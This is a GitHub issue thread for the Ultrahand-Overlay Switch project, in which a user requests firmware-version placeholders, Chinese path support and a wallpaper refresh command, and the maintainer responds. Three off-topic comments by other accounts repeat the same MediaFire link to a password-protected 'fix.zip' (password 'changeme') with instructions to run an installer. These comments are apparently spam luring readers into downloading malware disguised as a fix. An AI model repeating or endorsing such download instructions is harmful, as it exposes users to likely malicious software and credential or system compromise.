### ISSUE TITLE
A variable that can represent the current firmware version

### ISSUE THREAD

**Issue by do-kiss** [ppkantorski/Ultrahand-Overlay#175]
Hello！Is there a variable that can retrieve the current firmware version, such as '18.1.0'? I need to obtain the current firmware version when creating some packages, but I don't know how to get it using Ultrahand.

**Comment by ppkantorski** [comment]
yeah i can make it a placeholder in the next version.  called something like `{hos_firmware}`  and `{ams_firmware}`.

**Comment by do-kiss** [comment]
Wow, that's great,It will be very useful! Thank you!
I’m also curious, how likely is it that unzip and download support Chinese paths?

**Comment by ppkantorski** [comment]
that will take a little time.  v1.7.1 should be here very soon though.  i'll consider it more for v1.7.2

**Comment by do-kiss** [comment]
I'm really looking forward to it, Ultrahand is truly a great work.

**Comment by do-kiss** [comment]
There could be a command similar to 'refresh theme' to refresh the wallpaper, like 'refresh wallpaper'?

**Comment by do-kiss** [comment]
> 可能会有一个类似于“刷新主题”的命令来刷新壁纸，比如“刷新壁纸”？

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by do-kiss** [comment]
Sorry, I don't understand what this is. I can't start it after downloading.

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by do-kiss** [comment]
Yes, I found that when switching the Ultrahand background image multiple times, there is a small chance of encountering a blue screen error.

**Comment by ppkantorski** [comment]
See v1.7.1.  With this, I am going to close this issue thread.  Appreciate the feedback, hope the new additions are helpful to you.
